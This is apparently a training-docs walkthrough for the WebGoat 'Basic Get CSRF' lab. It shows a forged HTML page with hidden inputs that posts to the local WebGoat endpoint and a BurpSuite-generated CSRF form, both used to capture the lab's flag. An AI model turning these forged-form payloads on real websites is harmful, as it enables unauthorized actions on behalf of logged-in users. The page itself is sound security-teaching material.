A10:2021 | Server Side Request Forgery | Cross Site Request Forgery (3) | Cycubix Docs

Basic Get CSRF Exercise

Trigger the form below from an external source while logged in. The response will include a 'flag' (a numeric value).

Confirm Flag

Confirm the flag you should have gotten on the previous page below.


With VC and HTML

  • Hints: The form has hidden inputs. You will need to use an external page and/or script to trigger it. Try creating a local page or one that is uploaded and points to this form as its action. The trigger can be manual or scripted to happen automatically.

  • If we hit the button submit we can see a message that says that the request its coming from the form itself.

  • If we open the developer tools we can see the imputs the form has.

  • To create your own fake page go into visual code, create an HTML with the following code:

    <script>history.pushState('', '', '/');</script>
    <form action="http://localhost:8080/WebGoat/csrf/basic-get-flag" method="POST">
      <input type="hidden" name="csrf" value="false" />
      <input type="hidden" name="submit" value="Submit" />
      <input type="submit" value="Submit" />
  • Save the file as a fakepage.html. Go to WebWolf and upload the file. You sill see that the file will open in a new tab, and you will see the submit button. Once you do that, you will see a JSON message with the flag number: copy and paste the flag number in WebGoat's lesson.

With Engagement Tools on BurpSuite

  • There is a tool (Pro Version only) that allows you to create a HTML based on the POST request.

<form accept-charset="UNKNOWN" id="basic-csrf-get" method="POST" name="form1" target="_blank" action="">
    <input name="csrf" type="hidden" value="false">
    <input type="submit" name="submit">

Last updated